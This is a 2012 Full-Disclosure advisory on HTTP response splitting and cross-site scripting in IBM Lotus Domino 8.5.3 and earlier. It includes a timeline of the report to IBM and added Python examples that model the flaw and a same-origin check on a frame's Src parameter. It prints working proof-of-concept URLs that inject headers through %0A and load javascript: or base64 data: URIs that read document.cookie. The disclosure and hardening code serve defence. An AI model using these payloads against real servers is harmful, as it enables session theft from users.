[Full-disclosure] HTTP Response Splitting and XSS vulnerabilities in IBM Lotus Domino
- To: <submissions@xxxxxxxxxxxxxxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] HTTP Response Splitting and XSS vulnerabilities in IBM Lotus Domino
- From: "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx>
- Date: Fri, 7 Sep 2012 03:54:27 +0300
Hello list!
I want to warn you about HTTP Response Splitting and Cross-Site Scripting
vulnerabilities in IBM Lotus Domino. On 15 August IBM released an
advisory concerning these Cross-Site Scripting vulnerabilities.
CVE ID: CVE-2012-3301.
-------------------------
Affected products:
-------------------------
IBM Lotus Domino 8.5.3 and earlier versions are vulnerable. These
vulnerabilities will be fixed in Domino 8.5.4; IBM is still working on the
other vulnerabilities I have reported to them.
For fixes, workarounds and mitigations, see the IBM Security Bulletin:
http://www-01.ibm.com/support/docview.wss?uid=swg21608160
----------
Details:
----------
HTTP Response Splitting (WASC-25):
The path segment after /servlet/ is reflected into a response header without
its line breaks being neutralised, so a URL-encoded line feed (%0A) lets an
attacker terminate that header and append headers of their own:
http://site/servlet/%0AHeader:value%0A1
Cross-Site Scripting (WASC-08):
The same injection point gives XSS when the appended header is a Refresh
that sends the browser to a script-bearing URI. Works in several browsers
(in Mozilla Firefox only in versions before 3.0.9):
http://site/servlet/%0ARefresh:0;URL=javascript:with(document)alert(cookie)%0A1
Works in all versions of Firefox, but without access to cookies:
http://site/servlet/%0ARefresh:0;URL=data:html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B%0A1
A Location header can also be used for the XSS attack, with its own
browser-specific nuances.
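The following is an added model of the response-splitting defect described above, written for this page; it is not Domino code. The handler below is a constructed stand-in that copies the decoded path segment after /servlet/ into a header (the header name X-Servlet-Name, the status line and the Content-Length value are assumptions), so the effect of an injected %0A can be observed and compared with a handler that refuses CR, LF and NUL in the value. The parser splits on a bare LF and strips CR, the leniency that makes the advisory's LF-only payloads sufficient.

```python
# Added example (not Domino code): a minimal model of a servlet that reflects
# a path segment into a response header, the hardened variant, and a lenient
# header parser that shows the injected header as a browser would see it.
from urllib.parse import unquote

PREFIX = "/servlet/"  # assumed mount point, taken from the advisory's URLs


class HeaderInjection(ValueError):
    """Raised by the hardened handler when a header value carries CR/LF/NUL."""


def _segment(request_path: str) -> str:
    """Return the percent-decoded path segment after /servlet/."""
    if not request_path.startswith(PREFIX):
        raise ValueError("not a servlet path: %r" % request_path)
    return unquote(request_path[len(PREFIX):])


def _render(segment: str) -> bytes:
    """Serialise a minimal response whose one header echoes `segment`."""
    lines = [
        "HTTP/1.1 200 OK",
        "Content-Type: text/html",
        "X-Servlet-Name: " + segment,  # assumed reflection point
        "Content-Length: 0",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


def vulnerable_servlet(request_path: str) -> bytes:
    """Echoes the decoded segment unchecked: the response-splitting defect."""
    return _render(_segment(request_path))


def hardened_servlet(request_path: str) -> bytes:
    """Same handler, but refuses any value that could end a header line."""
    segment = _segment(request_path)
    if any(ch in segment for ch in "\r\n\x00"):
        raise HeaderInjection("CR, LF or NUL in header value: %r" % segment)
    return _render(segment)


def rejects(request_path: str) -> bool:
    """True when the hardened handler refuses the request."""
    try:
        hardened_servlet(request_path)
    except HeaderInjection:
        return True
    return False


def parse_headers(raw: bytes) -> dict:
    """Lenient parse: split on a bare LF and strip CR, as many browsers and
    proxies do. Names are lower-cased; a line without a colon is dropped;
    the first empty line ends the header block."""
    headers = {}
    for line in raw.decode("latin-1").split("\n")[1:]:  # skip status line
        line = line.rstrip("\r")
        if line == "":
            break
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


if __name__ == "__main__":
    probe = "/servlet/%0ARefresh:0;URL=javascript:with(document)alert(cookie)%0A1"
    print("injected Refresh:", parse_headers(vulnerable_servlet(probe)).get("refresh"))
    print("hardened rejects probe:", rejects(probe))
```

Rejecting the value is the right response; silently stripping CR/LF is also acceptable, but whichever is chosen it must run on the decoded value, after %0A and %0D have been turned back into bytes.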
Cross-Site Scripting (WASC-08):
The Src parameter of the mail frameset is loaded into the NotesView frame
without being restricted to same-origin paths, so the attack is possible via
data: and vbscript: URIs (the base64 payload below decodes to
<script>alert(document.cookie)</script>):
http://site/mail/x.nsf/MailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
http://site/mail/x.nsf/WebInteriorMailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
In x.nsf, "x" is the username of the logged-in user.
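The following is an added example, not Domino code and not IBM's fix (which this page does not describe): an allow-list check for a frame Src parameter of the kind shown above, together with a decoder that shows what the data: payload in the advisory's URLs carries. The function names are assumptions. The check accepts only a relative, same-origin path, which refuses data:, vbscript: and javascript: as well as absolute http(s) and scheme-relative (//host) targets, and it normalises the value the way browsers do first (leading/trailing controls and spaces stripped, tab/LF/CR removed anywhere) so that "java\tscript:" cannot slip past it.

```python
# Added example (not Domino code): same-origin allow-list for a frame Src
# parameter, plus extraction and decoding of the advisory's data: payload.
import base64
from urllib.parse import unquote, urlsplit

# Browsers strip C0 controls and spaces at both ends of a URL and delete
# tab/LF/CR anywhere inside it before parsing the scheme.
_EDGE_CHARS = "".join(chr(c) for c in range(0x21))
_INNER_STRIP = dict.fromkeys(map(ord, "\t\n\r"))


def normalise(src: str) -> str:
    """Apply the browser's whitespace/control-character normalisation."""
    return src.strip(_EDGE_CHARS).translate(_INNER_STRIP)


def is_safe_frame_src(src: str) -> bool:
    """Accept only a relative, same-origin path: no scheme (so data:,
    vbscript:, javascript: and http: are all refused), no authority
    (//host), and no backslashes (browsers treat them as slashes)."""
    value = normalise(src)
    if value == "" or "\\" in value:
        return False
    parts = urlsplit(value)
    return parts.scheme == "" and parts.netloc == ""


def frame_src(url: str) -> str:
    """Pull the Src parameter out of an advisory-style URL, splitting the
    query on '&' only: a ';' inside a data: URI must not act as a separator."""
    for pair in urlsplit(url).query.split("&"):
        name, sep, value = pair.partition("=")
        if sep and name == "Src":
            return unquote(value)
    return ""


def decode_data_uri(src: str) -> str:
    """Return the document body carried by a (possibly base64) data: URI."""
    value = unquote(normalise(src))
    scheme, sep, rest = value.partition(":")
    if not sep or scheme.lower() != "data":
        raise ValueError("not a data: URI")
    meta, sep, body = rest.partition(",")
    if not sep:
        raise ValueError("malformed data: URI")
    if meta.lower().endswith(";base64"):
        return base64.b64decode(body).decode("utf-8", "replace")
    return body


if __name__ == "__main__":
    # The first advisory URL above, used as constructed sample input.
    url = ("http://site/mail/x.nsf/MailFS?OpenFrameSet&Frame=NotesView&Src="
           "data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B")
    src = frame_src(url)
    print("Src allowed:", is_safe_frame_src(src))
    print("payload:", decode_data_uri(src))
```

Requiring a relative path is stricter than blocking a list of bad schemes, and that is the point: a deny-list would have to keep up with every scheme and obfuscation a browser accepts, while "no scheme, no authority" needs no maintenance.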
------------
Timeline:
------------
The full timeline can be read in the first advisory
(http://securityvulns.ru/docs28474.html).
- During 16.05-20.05 I wrote announcements about multiple vulnerabilities in
IBM software at my site.
- During 16.05-20.05 I sent five advisories via the contact form at the IBM site.
- On 31.05 I resent the five advisories to IBM PSIRT, which received them and
said they would send them to the developers (of Lotus products).
- On 15.08 IBM released their advisory (about the Cross-Site Scripting and HTTP
Response Splitting holes - just a few of the total number of holes).
- On 28.08.2012 I disclosed these vulnerabilities (second advisory) at my
site (http://websecurity.com.ua/5839/).
Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/